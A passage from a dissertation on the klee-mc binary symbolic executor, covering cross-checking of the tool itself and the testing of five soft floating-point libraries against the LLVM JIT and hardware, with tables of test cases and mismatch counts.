clearly incorrect (e.g., for 8-bit values x=0x80 ,y= 0, andn= 16). An obvious
mistake, but only arising in very specific circumstances. After being introduced to
the code base, the bug was detected and fixed in time for the next commit.
LLVM. Cross-checking fuzz-produced expressions found a broken corner case in
CHAPTER 3. MACHINE CROSS-CHECKING 81
LLVM’s arbitrary precision integer code. The arithmetic right shift operation is
mishandled for the single-bit case; LLVM incorrectly claims 1 >>1 = 0. This is
wrong for arithmetic right shift because the shift is defined to round to negative
infinity (i.e. 1). The SMT solver, however, gets it right. Fuzzing expressions loosely
resembles fuzzing constraint solvers [26], although we assume the solver to be correct
but not the expression builder. Since there are multiple SMT solvers, this assumption
may be lifted by submitting queries to several solvers and holding an election.
3.6 Related Work
Much recent work uses symbolic execution to find bugs both on source code [28, 58,
75, 119] and on binaries [30, 34, 59, 65]. In the latter category, S2E uses a QEMU-to-
LLVM translator to convert x86 code into fragments for klee . Another system [65]
uses the valgrind DBT, symbolically running the VEX IR directly. klee-mc shares
code with both: klee is the symbolic executor core and VEX translates. We view our
work as complementary to past efforts, which have been largely unreflective. Success
meant bugs in other code, rather than turning the tool on itself for trustworthy results.
We believe these other tools would benefit from the techniques in this chapter.
FuzzBALL [92] uses a symbolic binary executor to find edge cases in system-
level emulation features and instruction decoding. klee-mc focuses on user-level
code so the checks in klee-mc support self-hosting, whereas FuzzBALL excels at
manipulating system registers. Finally, klee-mc tests its own decoder; FuzzBALL
uses VEX as an internal decoder, but ignores VEX as a target because VEX only
models a user-mode environment.
Validation, or on-demand verification of individual paths, is a practical alterna-
tive to full-fledged verification of program code. Translation validation has been used
to validate compilation by verifying target code for a given source program [107],
intermediate forms in optimizer passes in the GNU C compiler [98], LLVM optimizer
passes [126], and program patches [94]. Instead of targeting compilation, we vali-
date expressions used during symbolic execution; optimized expressions are validated
against unoptimized expressions by reusing the constraint solver infrastructure from
CHAPTER 3. MACHINE CROSS-CHECKING 82
symbolic resolution.
For hardware, co-simulation [48] is a verification heuristic which validates exper-
imental hardware against a simulator oracle. klee-mc uses co-simulation with a
reversal of roles: hardware is an oracle for software.
CSmith [135] generates well-defined C programs to find defects in C compilers.
Both this work and ours share the use of cross-checking to dispense with needing
an oracle for correctness. They use pure concrete execution rather than symbolic,
targeting bugs in compilers rather than their infrastructure. Unlike klee-mc , which
validates against hardware, CSmith lacks a ground truth C compiler (verified C com-
pilers [84] remain experimental).
The verified L4 operating system micro-kernel [120] uses translation validation
to verify C sources match compiled code. L4 translation validation uses a processor
model to decode compiled code and checks it against a specification modeled by the
C code. klee-mc is weaker in that it validates code semantics through tests instead
of verification, but it targets more code; the binary translation models an x86-64
processor which is checked through native execution on the host hardware.
3.7 Conclusion
In our work on building and validating a dynamic binary symbolic execution stack,
we developed cross-checks at points where manual debugging would be intricate and
frustrating. Validating paths in the system boosted our confidence when implement-
ing new, experimental features. Furthermore, flagging mismatches at the basic block
level virtually eliminated many challenges with reproducing runtime bugs.
Engineering a robust bug checker is the next logical step for symbolic execution.
Much progress has been made in systematically finding bugs in third party programs.
However, it is time to detect bugs in the checker for better confidence in the process
itself. We have presented cross-checking in a symbolic executor as a method to find
errors in program evaluation given a complex dynamic program analysis system. The
symbolic executor detected thousands of serious program errors in commodity third
party binaries, all of which can be mechanically confirmed through a high-integrity
CHAPTER 3. MACHINE CROSS-CHECKING 83
test replay system. Likewise, we found many errors in the analysis tool itself by testing
with a generous program set. Considering the results, we believe cross-checking is the
easiest and fastest way to find binary symbolic interpreter bugs and develop a high-
quality binary program analysis tool.
Chapter 4
Off-the-Shelf Symbolic
Floating-Point
4.1 Introduction
To obtain a satisfying variable assignment for a constraint set, a symbolic executor
usually represents constraints as expressions over a theory of bit-vectors and arrays
which is solved by some decision procedure or theorem prover. Deciding satisfiability
modulo the theory of bit-vectors is meant for integer workloads; expressions consist
of two’s complement arithmetic, integer comparisons, and bitwise operators.
Solving for expressions over floating-point operations requires additional effort
and is considered a significant challenge in model checking [1]. There is little agree-
ment on how to best handle symbolic floating-point data in a symbolic executor;
in fact, several classes of floating-point support have been proposed. The simplest
support evaluates only concrete data [28], which is fast and sound, but incomplete.
Another approach, but still incomplete, applies taint analysis [57] and floating-point
expression matching [41] to detect suspicious paths. The most challenging, complete
and accurate symbolic floating-point semantics, relies on the flawless reasoning of a
floating-point solver [6, 10, 20].
Accurate floating-point is essential for checking software. The de facto floating-
point standard, IEEE-754 [71], fully describes a floating-point arithmetic model; it is
84
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 85
subtle and complicated. A cautious software author must account for lurid details [61]
such as infinities, not-a-numbers ( NaNs), denormals, and rounding modes. Ignoring
these details is convenient once the software appears to work but defects then arise
from malicious or unintended inputs as a consequence.
Fortunately, IEEE-754 emulation libraries already encode the specifics of floating-
point in software. Namely, a soft floating-point library emulates IEEE-754 operations
with integer instructions. These libraries are a fixture in operating systems; unim-
plemented floating-point instructions trap into software handlers. Elsewhere, soft
floating-point shared libraries assist when the instruction set lacks floating-point in-
structions.
This work presents an integer-only binary symbolic executor augmented to support
floating-point instructions through soft floating-point libraries. Five off-the-shelf soft
floating-point libraries are adapted to the symbolic executor by mapping soft floating-
point library operations to a unified runtime interface. Floating-point instructions are
mapped to integer code by transparently replacing program instructions with calls to
soft floating-point runtime functions, an idea that can apply to nearly any symbolic
executor. Aside from testing floating-point paths in general purpose programs, binary
symbolic execution with soft floating-point provides a novel means for testing floating-
point emulation libraries and floating-point theorem provers.
The rest of this chapter is structured as follows. Section 2 discusses related work,
relevant background, and the motivation behind soft floating-point in a symbolic ex-
ecutor. Section 3 describes the operation and implementation of soft floating-point in
a binary symbolic executor. Section 4 analyzes operation integrity through symbolic
execution of soft floating-point libraries with symbolic operands by comparing the
generated test cases against native evaluation on host hardware. Section 5 continues
by testing floating-point SMT solvers for inconsistencies with hardware. Section 6
considers general purpose applications by examining errors in Linux binaries found
through symbolic execution with soft floating-point. Finally, Section 7 concludes.
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 86
4.2 Related Work
Testing and verification of floating-point software is the topic of much study. At the
most primitive level, finite-width floating-point variables are reconciled with real and
rational arithmetic and are the focus of floating-point decision procedures. Static
analysis of source code leverages these primitives to find floating-point bugs but is
limited to only an approximation of execution. A symbolic executor of floating-point
code dynamically executes programs and must balance performance, completeness,
and soundness with different workload needs. If floating-point data is concrete or un-
interesting symbolically, symbolic execution of floating-point operations may be ex-
clusively concrete [28]. Fast, but unsound, symbolic floating-point, useful for bug find-
ing, applies canonicalization and matching on floating-point expressions [41, 57, 87].
When complete semantics are necessary, precise symbolic floating-point integrates
a floating-point solver into the symbolic execution stack [6, 10, 20, 82]. This work
introduces a new point in this progression: symbolically executed softfloating-point
with integer code.
Many techniques have been developed to handle abstract floating-point data. Ab-
stract domains [43], interval propagation [47], and abstraction refinement [38] are
some influential approaches for computing solutions to value constraints. Such con-
cepts have been extended, improved, and refined for floating-point values through
exact projections [20], filtering by maximum units in the last place [6], interval lin-
ear forms [95], monitor variables [72], saturation with simplex bounding [42], conflict
analysis over lattice abstractions [64], and guided approximation transformations of
formulas [22], among others. For ease of use, decision procedures based on these
strategies may be integrated into a solver back-end [6, 20, 22, 42, 64]. For hard-
ware, formal floating-point specifications have been used to verify the correctness of
a gate-level description of a floating-point unit [102].
Static analysis of source code to find floating-point bugs includes a broad class of
notable abstract interpretation systems. The fluctuat [63] system models floating-
point values in C programs with affine arithmetic over noise symbols to locate sources
of rounding error with respect to real numbers. astr ́ee[19] is based on an interval
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 87
abstraction that uses a multi-abstraction, specializable, domain-aware analysis to
prove the absence of overflows and other errors for source programs written in a
subset of the C language.
In the context of symbolic execution, the simplest floating-point tactic discards
symbolic data in favor of processing floating-point operations through concretiza-
tion [28]. To dispatch a floating-point operation on symbolic data, each operand
is constrained to a satisfying variable assignment (concretized) and the operation is
evaluated. As an example, if xis unconstrained and 0 is the default assignment,
computing x+1.0 concretizes to 0 .0+1.0. Concretization is fast but it overconstrains
the variable term xand discards most feasible values (in this case, x̸= 0.0).
A symbolic executor with expression matching also avoids the difficulty of support-
ing full floating-point semantics. These symbolic executors broaden the expression
language to include floating-point operators but only impose additional structure on
expressions; the operations are purely superficial. Taint tracking, where data be-
comes “contaminated” according to a taint propagation policy and operations on
tainted data are flagged according to a detection policy, is one instance of expres-
sion analysis on symbolic floating-point; floating-point operations tag expressions as
tainted and dereferences of tagged pointers are flagged [57]. Beyond tainting, com-
parison of expression structure [41, 87] demonstrates equivalence between algorithm
implementations. This analysis is often unsound; spurious errors are possible.
Precise symbolic floating-point reasons about the underlying semantics by using
a floating-point solver. Although explicit reasoning is accurate and often complete
by design, it demands a careful solver implementation (tested in Section 4.5) and
invasive executor modifications [10]. In some cases, authors of these systems use the
symbolic executor as a platform to test their own floating-point decision algorithms
in lieu of a third-party IEEE-754 solver [6, 20, 82].
This chapter proposes symbolically executed soft floating-point, a compromise
between concretization and full symbolic floating-point. Where a floating-point solver
may model a formula as disjunctions of several feasible subformulas, soft floating-
point models that formula with many states. A soft floating-point operation partially
concretizes on program control at contingent branches by forking off multiple states.
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 88
31Sign Exponent Mantissa
1 bit 8 bits 23 bits0
Single Precision63Sign Exponent Mantissa
1 bit 11 bits 52 bits0
Double Precision
Figure 4.1: IEEE-754 format for single and double precision floating-point data
These states partition floating-point values by disjunction but together represent the
set of all feasible floating-point values. Additional states are costly but soft floating-
point remains attractive because the complicated floating-point component is off-the-
shelf software which requires little support code and no changes to the core symbolic
execution system. Aside from its simplicity, soft floating-point is self-testing in that
tests can be efficiently derived directly from the libraries using symbolic executor, a
property explored in Section 4.4 and applied to floating-point solvers in Section 4.5.
4.3 Soft Floating-Point
This section details the implementation of a soft floating-point extension for an
integer-only symbolic binary executor. First, an abstract soft floating-point library
is defined by its set of floating-point operations. Next, the components for the base
binary symbolic executor are briefly outlined. Finally, a description of a runtime in-
terface and implementation establishes the connection between the symbolic executor
and several soft floating-point libraries.
4.3.1 Floating-Point Operations
A soft floating-point library is a collection of idempotent integer-only operation func-
tions which model an IEEE-754-1985 [71] compliant floating-point unit. The client
code bitcasts floating-point data (single or double precision) into integer operands;
the library unpacks the sign, mantissa, and exponent components (Figure 4.1) with
bitwise operators into distinct integers. Operations evaluate the components, then
pack and return floating-point results in IEEE-754 format.
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 89
Arithmetic
IEEE-754 defines the four-function arithmetic operations and remainder: +, −,∗,/,
and %. Arithmetic operations are complete floating-point valued functions over single
and double-precision pairs. A major repercussion of floating-point arithmetic is many
desirable invariants from real numbers and two’s-complement are lost: addition is non-
associative, subtraction has cancellation error, and division by zero is well-defined.
Comparisons
Conditions on floating-point values are computed with comparison functions. Com-
parisons are defined for all pairs of 32-bit and 64-bit floating-point values and are
represented with the usual symbols (i.e., =, ̸=,>,<,≥, and≤). Evaluation returns
the integer 1 when true, and 0 when false.
Comparisons take either an ordered or unordered mode. The mode determines
the behavior of the comparison on non-number values. An ordered comparison may
only be true when neither operand is a NaN. An unordered comparison is true if either
operand is a NaN. During testing, only ordered comparisons were observed in code, so
the two were never confused when evaluating floating-point code.
Type-Conversion
Type conversion translates a value from one type to another; floating-point values may
be rounded to integers and back, or between single and double precision. In general,
rounding is necessary for type conversion. Additionally, values may be rounded to
zero, down to−∞, up to∞, or to nearest, depending on the rounding mode. However,
only the round nearest mode appeared in program code during testing. There are
several ways a floating-point computation may be rounded for type conversion:
•Truncation and Expansion (↔). Data is translated between single and
double precision. Mantissa bits may be lost and values can overflow.
•Integer Source (f←i). Conversion from integer to float. The integer may
exceed the mantissa precision.
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 90
•Integer Target (f→i). Conversion from float to integer; NaNand∞values
may be converted.
Elementary Functions
The only elementary function required by IEEE-754-1985 is the square root function.
Hence, all soft floating-point libraries support it. Transcendental functions, on the
other hand, were deemed too costly to due to the precision necessary for correctness
to the half-unit in the last place (the table-maker’s dilemma [73]); few soft floating-
point libraries support these functions because they are not part of the standard.
Although present in some instruction sets (e.g., x86), transcendental functions are
treated as unsupported non-standard extensions; these extensions can be implemented
as intermediate code intrinsics ( §2.4.5) using standard floating-point operations if
necessary for instruction emulation.
4.3.2 Runtime Libraries
The soft floating-point extended symbolic interpreter handles floating-point opera-
tions by calling out to a runtime library with a standard interface. All floating-point
instructions are replaced with runtime function calls that manipulate floating-point
data with integer instructions; the target program is essentially dynamically linked
to the floating point library by way of its floating-point instructions. Internally,
the runtime libraries differ on a fundamental level by the data encoding used for
computation. Floating-point emulation code is readily available and easily portable;
open-source operating systems supply many distinct library implementations which
need few modifications to work with the symbolic executor.
A soft floating-point library, loaded as part of the klee LLVM bitcode runtime,
encodes data operations in integer terms with an idempotent function call interface.
If the library is correct and completely specified, then every floating-point operation
is fully modeled; there is no need to re-encode the details. If the library is wrong or
incomplete, it can be detected by testing for faulty inputs and cross-testing with other
implementations ( §4.4). To map floating-point code to the integer-only interpreter,
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 91
the program code is rewritten with soft floating-point calls. To validate the design,
the runtime supports five off-the-shelf soft floating-point implementations: bsdhppa
(PA-RISC from NetBSD), bsdppc (PowerPC from NetBSD), linmips (MIPS from
Linux), softfloat (the SoftFloat library [67]), and shotgun (from an emulator [74]).
Instruction Rewriting
A function pass rewrites program code to call soft floating-point runtime functions
in place of LLVM floating-point instructions. The pass replaces every floating-point
instruction in the program code with a call to a type thunking stub. The thunk
function bitcasts the operands to integer types (no bits change) and jumps to the
corresponding runtime library function. At execution time, these integer-only runtime
functions compute all floating-point operations.
Interface
For basic functionality, the standard interface uses a strict subset of the SoftFloat [67]
library. SoftFloat features a set of functions which take floats and doubles bitcast
to unsigned integers and return bitcast results. All other soft floating-point libraries
require small custom SoftFloat interface adapters. This standardization simplifies
instruction rewriting with a single target interface.
LLVM instructions are rewritten as function calls to their SoftFloat counterparts.
Table 4.1 lists the functions which replace LLVM instructions for symbolic interpre-
tation. The instructions encode arithmetic, comparisons, and rounding which are
handled by the soft floating-point functions.
Floating-point operation handlers are stored as interchangeable libraries for the
interpreter. Depending on the emulation code, each library is compiled from C to
LLVM bitcode (a binary representation of an LLVM assembly listing). Since a bitcode
library is native to the klee LLVM machine, it can not support hand-coded assem-
bly which is found in some soft floating-point implementations. Although klee-mc
can process machine instructions, handling the additional context necessary for ma-
chine code runtime libraries appears to require considerable restructuring and gross
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 92
LLVM Instruction SoftFloat Function
FAdd ,FSub float{32,64}{add,sub}
FMul ,FDiv ,FRem float{32,64}{mul,div,rem}
FCmp float{32,64}{lt,le,eq}
FPExt float32 float64
FPTrunc float64 float32
FPToSI float{32,64}int{32,64}
SIToFP int{32,64}float{64,32}
sqrtf ,sqrt float{32,64}sqrt
Table 4.1: Rewritten LLVM instructions with corresponding SoftFloat functions
overengineering of both the JIT and symbolic executor basic block dispatch code.
Software Encodings
Floating-point unpacking policies are either selective or unselective. SoftFloat selec-
tively masks components out as needed to local variables. Both bsdhppa andbsdppc ,
on the other hand, completely unpack floating-point values into a data structure be-
fore every operation and repack the result into the IEEE-754 format. The best repre-
sentation depends on the circumstance. SoftFloat has a single compilation unit; the
representation likely benefits from interprocedural analysis. BSD has multiple compi-
lation units; mask calculations like SoftFloat’s would repeat at function boundaries.
Operating System Handlers as Libraries
The runtime uses off-the-shelf operating system code ported from one Linux and two
BSD floating-point emulators. The soft floating-point implementations in operating
systems are often quite good and at least heavily tested. This is because on sev-
eral machine architectures (e.g., x86, ARM, MIPS), an operating system may be
expected to emulate a hardware floating-point unit through software. Correctness
and reproducibility demand that the software emulation closely matches hardware,
hence operating systems should have accurate soft floating-point implementations.
In many cases, soft floating-point code can be compiled into LLVM bitcode for the
runtime bitcode library. The floating-point emulation layer is intended to run on the
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 93
target operating system architecture and is usually written in C. After adjusting a few
header files, the code can be compiled independently into a bitcode library. Handlers
accelerated with assembly code (e.g., x86 Linux, ARM BSD), however, must compile
to native machine code.
The soft floating-point library must extract the relevant functionality from the
rest of the operating system code. In contrast to the symbolic executor’s instruction
rewriting pass, an operating system’s native emulation mechanism traps and emulates
missing floating-point instructions. Whenever a user program issues a floating-point
instruction, control is trapped and vectored to the operating system. The trapped
instruction is decoded into a soft floating-point computation; the computation uses
only integer instructions and stores the result to the machine state. Finally, control
returns to the next program instruction. Since the symbolic executor rewrites floating-
point instructions instead of trapping, the executor bypasses the decoding logic and
directly calls the floating-point operations.
Library-specific SoftFloat glue code translates internal floating-point calls to the
standardized SoftFloat interface. The internal functions never trap or decode in-
structions, so those stages are ignored and inaccessible. Porting requires relatively
few lines of code; glue code for linmips ,bsdhppa , and bsdppc is between 50 and 150
lines of C source.
4.4 Operation Integrity
Once a floating-point library is in place, it is possible to test the library. Test cases
are gathered by symbolically executing a binary program with a given soft floating-
point library for each floating-point operation. Cross-checking intermediate path data
with the JIT over the host’s hardware floating-point unit detects interpreter and soft
floating-point inconsistencies. Pooling tests by operation across all libraries addresses
the problem of single library underspecification; tests for a single library may cover all
paths with correct results but still have inputs that do not match hardware. The JIT,
with soft floating-point libraries and without, is checked against hardware execution
of the binary on the pool of all test cases. Every library disagrees with hardware; some
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 94
patterns emerge as common pitfalls. Finally, significant library coverage confirms the
thoroughness of testing.
When comparing soft floating-point libraries with hardware, it is useful to dis-
tinguish between consistency and verification . If tests derived from a library Lall
match hardware, then Lisconsistent with hardware under a symbolic executor: for
every library path there is a test case which matches hardware. When Lis consistent
on an operation◦it is◦-consistent . Verification against hardware is stronger than
consistency: all possible inputs for Lmust match hardware. Consistency without
verification arises when an underspecified program misses edge cases which describe
inconsistent test cases. Consequentially, tests from a library L∗may induce a mis-
match on a consistent but underspecified library L.
The soft floating-point code is tested in two phases. In the first phase, opera-
tion programs are symbolically executed to produce test cases for each library. To
determine consistency, the symbolic executor is cross-checked with the LLVM JIT’s
machine code through a log replay mechanism that compares intermediate concrete
values (§3.3.3). If the emulation is wrong, symbolic interpretation diverges from the
JIT values, potentially causing false positives and negatives with respect to native
execution. In the second phase, to handle underspecification, operations are cross-
tested on a test case pool and checked against an Intel Core2 processor. Further, the
pool tests the JIT, which compiles floating-point LLVM instructions to machine code,
and raises several translation errors.
Figure 4.2 illustrates the process of cross-checking floating-point symbolic inter-
pretation with a JIT and native hardware. To generate test cases, an x86-64 pro-
gram binary is symbolically executed with klee-mc and a soft floating-point bitcode
library. The test’s register log ( §3.3.1) then replay cross-checks the library results
against the LLVM JIT engine executing native floating-point instructions (Interpreter
×JIT). Test case values are inputs for hardware cross-checking (JIT ×Hardware);
the soft floating-point JIT is cross-checked, basic code block by basic block, against
the registers from native execution of the binary program.
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 95
Figure 4.2: Generating program tests and cross-checking soft floating-point
4.4.1 Gathering Test Cases
Each floating-point operation is modeled through a distinct test program binary.
These test programs, which we call operation programs , are compiled from small C
source files into x86-64 Linux programs which read IEEE-754 formatted operands
from the standard input. Only binary programs are evaluated, rather than C source
or LLVM bitcode, to keep any compilation artifacts [97] the same among the symbolic
executor, JIT, and hardware. Likewise, the operation programs test the machine code
interface of the symbolic executor with compiled C, so some functionality is masked or
inaccessible. This masking is particularly noticeable for the remainder (%) program
which must use the math library fmod function because the C language only defines
integer modulus operations.
The operation program reads operands from a symbolic standard input stream
under symbolic execution. When the symbolic executor completes a path, it creates
a test case by selecting a feasible input bit-string which satisfies the path constraints
imposed by the soft floating-point runtime library. Feeding the bit-string into the
operand program reproduces the floating-point library path.
Table 4.2 lists the number of test cases produced by the symbolic executor for each
floating-point library. Test programs are split by precision: 32-bit single-precision
(f32) and 64-bit double-precision (f64). The number of test cases for a completed
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 96
Op. bsdhppa bsdppc linmips softfloat softgun
f32 f64 f32 f64 f32 f64 f32 f64 f32 f64
+ 122 1017 1670†2016†3741 6523†99 99 458 868
- 122 1017 1615†1717†3738 6480†99 99 458 868
* 3700‡520†‡368†‡349†‡1945‡2235†‡51 51 388‡582†‡
/ 6109†6268†2932†3520†4694†5268†132‡81†‡6373†6639†
% 3247†3359†2 3680†3156†3397†2900†3010†3057†3394†
< 28 32 1341†1661†91 91 7 7 11 13
≤ 34 38 2034†2353†91 91 7 7 11 13
= 2890 42 1359†1140†2905 91 125 14 1061 18
̸= 2890 42 1402†1413†2905 91 125 14 1061 18
↔ 29 31 29 91 29 22 8 14 28 27
→i32 81 67 68 69 65 20 17 12 64 15
→i64 142 142 171†‡145†‡97 82 39 34 201 211
←i32 14 6 75 34 51 35 5 4 72 34
←i64 118 46 1466†491 191 89 14 8 477 119√x3451†2979†2583†4500†4856†3819†32‡25‡92‡1355†‡
Total 20087 15606 17115 23179 28555 28334 3660 3476 13812 14174
Table 4.2: Floating-point operation test cases from symbolic execution.
operation is a strict upper bound on the number of states that will fork on a floating-
point instruction in a symbolically executed program. Operations marked †and
‡timed out exploring paths and solving queries respectively. Implementation differ-
ences lead to unique test case counts for each operation across libraries; some libraries
fork more ( bsdppc ) than others ( softfloat ).
The test case counts wildly vary across libraries but some implementation details
may be surmised from the data. Several patterns from the generated test cases qual-
itatively stand out. Operations are sometimes insensitive to precision; softfloat ’s
addition operation and the linmips less-than operation show the same total tests for
both single-precision and double-precision. These equal test counts suggest the oper-
ations use essentially the same code for both precisions, only changing the bit-width.
Libraries which have different test case counts could have additional, but unnecessary
paths, for each precision. Likewise, equal tests across operations suggest very similar
code; the = and̸= operations may perform the same computation, then negate the
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 97
solution if necessary. Single-precision surprisingly can have more paths than double-
precision, such as for = and →i32, which may be due to compilation artifacts or
optimizations inserted by the compiler.
A complete symbolic execution of an operation test program exhausts all paths.
Every feasible path becomes a test input (e.g., pairs of floating-point values for binary
operations) which satisfies the path constraints. Path exhaustion can be costly, how-
ever, so each program runs for a maximum time of one hour with a two minute solver
timeout in order to enforce a reasonable limit on total execution time; most opera-
tions ran to completion. Relatively complicated operations, such as division, timed
out across all libraries. The symbolic executor is sensitive to the branch organization
of the library code so some simpler operations (e.g., + for bsdppc andlinmips ) time
out from excessive state forking.
4.4.2 Cross-Checking for Consistency: Interpreter ×JIT
Symbolically executing an operation ◦produces a set of test inputs which exercise
distinct paths through the floating-point emulation library. Ideally, the symbolic
interpreter exhausts all paths on ◦, leading to a test case for every possible path on
◦. The test cases are replayed concretely on the LLVM JIT and cross-checked with
the symbolic interpreter’s concrete values to find bugs in the symbolic interpeter.
Testing with cross-checking determines consistency; when all of ◦’s test cases for a
library cross-check as matching, the library is ◦-consistent.
The symbolic interpreter is a custom LLVM interpreter which may diverge from
bitcode semantics. To find divergences, the interpreter’s soft floating-point library
results (in emulated hardware registers) are checked against natively executed LLVM
JIT machine code for bit-equivalence at every dispatched basic block. These checks
replay a test case on the JIT and cross-check with the interpreter’s concrete register
log.
The number of failures for symbolically generated test cases is given in Table 4.3.
There are three reasons for failure to cross-check: 1) the path terminated early (log
runs out), 2) the floating-point library is wrong, or 3) the LLVM JIT engine emits
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 98
Op. bsdhppa bsdppc linmips softfloat softgun
f32 f64 f32 f64 f32 f64 f32 f64 f32 f64
+ 1 1 0 76 0 0 0 0 0 0
- 1 1 0 5 0 0 0 0 0 0
* 2 30 29 28 0 8 0 0 0 18
/ 2 1 2 0 0 0 0 29 1 0
% 7 3 0 828 30 2 13 3 67 207
< 0 0 0 148 0 0 0 0 1 2
≤ 0 0 0 368 0 0 0 0 2 1
= 0 0 174 161 0 0 0 0 718 12
̸= 0 0 233 213 0 0 0 0 718 12
↔ 0 0 6 0 1 2 0 0 1 0
→i32 2 2 12 0 0 0 2 0 0 0
→i64 2 2 86 5 0 0 2 0 169 152
←i32 0 0 30 19 0 0 0 0 0 0
←i64 0 1 312 76 0 0 0 0 0 0√x 9 92 8 4 5 1 8 10 84 18
Total 26 133 892 1931 36 13 25 42 1761 422
Table 4.3: JIT register log cross-checking failures on floating-point library self-tests
wrong instructions. Failure to complete paths is demonstrated by softfloat divi-
sion and linmips multiplication. All libraries fail cross-checking as highlighted in
Table 4.4. It is likely the libraries have never been systematically cross-checked, so
inconsistency is expected. Furthermore, JIT engine errors arise in√xand % for
bsdppc and softfloat , but are discussed in the next section because they require
systematic hardware cross-checking for confirmation.
4.4.3 Cross-Testing for Underspecification Bugs
A consistent floating-point library may appear correct with path-exhaustive testing
but it is still unverified over all values . Some components could be underspecified
by missing edge cases, causing broken inputs to never materialize as paths. Under-
specification may stem from the library (and therefore its tests) partially describing
IEEE-754 semantics or the decoder mistranslating machine instructions. Addition-
ally, consistency alone merely demonstrates interpreter and JIT equivalence over all
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 99
Library Operation Library Soft FP Hardware FP
bsdhppa ∞∗0.0 NaN -NaN
bsdppc 1.1125...6e-308 + 1.1125...7e-308 5e-324 2.2250...1e-308
linmips 0x7ff0000001000000 (NaN)→f32 0x7fbfffff (NaN)0x7fc00000 (NaN)
softfloat NaN→i32 0x7fffffff 0x80000000
softgun 0.0 / 0.0 0.0 - NaN
Table 4.4: Selected library bugs from soft floating-point library consistency tests
discovered paths; both can still possibly disagree with hardware. Pooling all tests for
all discovered library paths and testing concrete JIT replay against native processes,
on the other hand, finds bugs from underspecification and mistranslation.
Pooled Tests
Cross-checking detects only mismatches on known inputs; the symbolic executor must
provide the input test cases. If a floating-point library is underspecified , then sym-
bolic execution may not generate a test case for a hardware mismatch because no
code necessarily describes the value. An underspecified library is incorrect despite
being consistent. In fact, many operations cross-check as consistent; softfloat and
linmips seem to perfectly convert floating-point to and from integers because the
libraries are{→i32,→i64,←i32,←i64}-consistent. However, these consistent oper-
ations are not correct but underspecified; no path describes a bug under all feasible
solutions, despite bugs being present when compared with hardware.
The underspecification problem can be partially mitigated by cross-testing across
libraries. All tests are pooled and hardware cross-checked on all floating-point li-
braries. The test pool is applied to each library to cover values or conditions missed
by underspecification.
Figure 4.3 illustrates the distinct value coverage for each library. The bsdppc
library stands out as flooding comparison operations with unique values, agreeing
with high fork rate in Table 4.2. Similarly, the linmips andbsdhppa libraries dom-
inate the unique values for arithmetic operations. Heavy skewing essentially reflects
implementation quirks. More single-precision values are shared among libraries than
double-precision, possibly because there are fewer possible values for single-precision,
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 100
0102030405060708090100
+-*/%<< ==!=
<->> i32 
> i64< i32 
< i64 x1/2% Total Test Cases
Single-Precision OperationSingle-Precision Test Cases By FPU
0102030405060708090100
+-*/%<< ==!=> i32 
> i64< i32 
< i64 x1/2% Total Test Cases
Double-Precision OperationDouble-Precision Test Cases By FPU
<->
linmipssoftfloatsoftgun bsdppc
bsdhppa
shared
Figure 4.3: Floating-point test case distribution
although there are more single-precision tests (54425) than double-precision (49164).
The unevenness of unique values among libraries and across operations suggests that
no one library produces a complete test suite of values.
There are two ways to account for the uneven test case distribution among the
libraries. One, even if distinct libraries compute the same result, the values for
test cases can differ due to how each implementation structures its code; different
decision trees lead to different partitions of values. Two, given incorrect emulation
of floating-point, the test case values from incorrect code may cover a divergence
between library and hardware floating-point algorithms. Ideally, the test cases would
uncover no divergences because no library would be underspecified.
In total, there were 103624 distinct test cases. The test count is 34 orders of
magnitude smaller than brute force testing ((6(232+264)+9(264+2128)) tests) because
there are fewer unique paths than unique inputs. However, so many tests may be
still relatively inefficient; one hand-designed suite [80] for exp( x) uses 2554 tests.
When test count is a concern (e.g., tests are expensive), non-exhaustive execution
can give useful results. We found randomly dropping forked states on hot branches
still covered incorrect values for all libraries with 19560 distinct tests.
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 101
Op. bsdhppa bsdppc linmips softfloat softgun JIT
f32 f64 f32 f64 f32 f64 f32 f64 f32 f64 f32 f64
+ 603 135 7 8034 45 90 6 12 80 92 0 0
- 623 109 47 5354 45 63 6 9 62 81 0 0
* 50 53 8 1295 21 23 8 7 23 28 0 0
/ 56 52 2 831 32 28 2 4 37 41 0 0
% 176 123 134 13 176 58 9 7 4263 4638 35 3
< 0 0 0 270 0 0 0 0 52 402 0 0
≤ 0 0 0 405 0 0 0 0 72 609 0 0
= 0 0 650 7 0 0 0 0 4665 125 0 0
̸= 0 0 669 6 0 0 0 0 4736 204 0 0
↔ 5 84 49 19 4 7 0 0 2 4 0 0
→i32 40 32 86 38 25 26 40 31 25 26 0 0
→i64 153 76 304 121 24 27 47 36 257 264 0 0
←i32 147 75 147 75 0 0 0 0 0 0 0 0
←i64 1668 650 1671 651 55 0 55 0 55 0 55 0√x 36 6 39 18 36 0 0 0 36 6 36 6
Total 3557 1395 3813 17137 463 322 173 106 14365 6520 126 9
Table 4.5: Hardware cross-check errors from all distinct floating-point tests
Checking JIT×Hardware
Table 4.5 shows cross-checking errors found from cross-testing with a pool of foreign
test cases. The JIT is cross-tested with a ptrace d native shadow process; for every
dispatched decoded instruction block, ptrace hardware registers are checked against
the JIT’s emulated registers. A single bit difference is an error for a test case. Con-
sistent operations, such as softfloat ’s−, are found to be incorrect, because they do
not match hardware, and underspecified, because only tests from other floating-point
libraries reveal the defect. Some operations under some libraries show fewer errors
for one precision than the other (or none at all); this discrepancy likely owes to these
libraries having fundamentally different implementations for each precision and the
uneven distribution of test values.
